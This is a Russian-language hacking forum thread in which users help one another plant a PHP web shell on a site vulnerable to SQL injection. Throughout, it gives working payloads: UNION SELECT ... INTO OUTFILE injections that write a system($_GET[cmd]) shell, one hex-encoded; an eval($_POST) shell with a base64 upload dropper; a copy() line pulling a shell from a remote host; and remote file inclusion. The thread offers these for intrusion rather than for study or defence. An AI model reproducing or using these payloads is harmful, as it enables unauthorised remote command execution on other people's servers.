В общем имеется дырявый сайт с инъекцией http://site.com/bug.php?&id=-1' union select 1,2/* Пытаюсь залить на него php-shell: http://site.com/bug.php?&id=-1' union select <? system($_GET[cmd]);?>,2 into outfile '/www/site/shell.php'/* Шелл shell.php успешно создается но при попытке исполнить команду http://site.com/shell.php?cmd= ничего не выводится. Пытался использовать и exec() и passthru() - результат тот же. Функции system(),exec() и passthru() не задизейблены. Подскажите что не так? ЗЫ сервер крутится на винде
моё решение, заливаешь шелл вида <?php eval($_POST['shell'])?> создаёшь html файл с кодом Code: <html> <body> <form action=[адрес шелла]> <textarea name='shell'> </textarea> </body> </html> Затем берёшь и перегоняешь весь код шелла в base64 и пишешь нечто такое - Code: $fh=fopen('newshell.php','w'); fputs($fh,base64_decode('шелл в бэйс64')); fclose($fh); Вставляешь в textarea и отправляешь Вот примерно так
http://site.com/bug.php?&id=-1' union select file_priv,2 from mysql.user/* Если Y будет, то можно будет INTO OUTFILE, если N, то соответсвенно низя (ну и если выругается, что доступа нет - тоже)
Basurman, и зачем ему это? пздц, ты вообще первый пост читал? ty13r, делай то что тебе Слип говорит ЗЫ Ты кстати какие команды пытался выполнить?
ты што, наркоман? у него файл создаётся соответственно у юзера file_priv = 1, нахуя ему их узнавать то теперь раз он уже смог файл залить? ты сам понял чё написал?
Spyder это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер 2Basurman а ты знаешь что к таблице mysql.user вобще обычно доступ закрыт?
1) Ой, только не надо поучать Spyder-a 2) ty13r задал вопрос, на который надо отвечать, а не оффтопить...
<? copy("http://sait.narod.ru/shell.php","./shellcheg.php"); ?> это лучше захексить запускаешь скрипт шелл копируется из указанного пути (http://sait.narod.ru/shell.php) в папку со скриптом подименем shellcheg.php
Нет вы извините конечно за оффтоп, но кто такой Spyder, чтобы ему уже нечему было учиться???? Evil вот и не оффтопь, раз такой умный Scipio зачётный способ как-то не догадался)))
Посмотри на свою репу, и на репу Spyder-a... А что касается поставленного вопроса: проинклудь шелл и все.
если уж на то пошло, то то есть не пользуйся пробелами в <?system($_GET[cmd]);?> .. далее, можешь внутри система заинеодить в бэйс. у меня много раз не пропускало именно изза $
Такс, давай те по порядку, а то я щас с ума сойду ТС говорит что файл создаётся (!!!), т е права на создание файлов есть, из этого следует вопрос нахуя нужен вот этот пост ------> https://forum.antichat.ru/showpost.php?p=553675&postcount=6 ????? далее это кто тебе такую чушь сказал? тебя обманули жестоко Ты хочешь скать есть выполнить код <?include($_GET[inc])?> и проинклудить удалённый шелл который работает постом и естественно файлы льются тоже с использованием метода пост, то работат ничего не будет? Ты серьёзно так думаешь? blackybr: в случае allow_url_fopen будут Блеки, вообще то http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/* <?system($_GET[cmd]);?> - надо в кавычки обрамлять blackybr: Извини ламера DDDD хватет мои посты редактировать blackybr: старею )
тогда уж http://site.com/bug.php?&id=-1'+union+select+0x3C3F73797374656D28245F4745545B22636D64225D293B3F3E,2+into+outfile+'/www/site/shell.php'/* а вобще думаю мой вариант наиболее оптимальный (хотя как пхп настроен)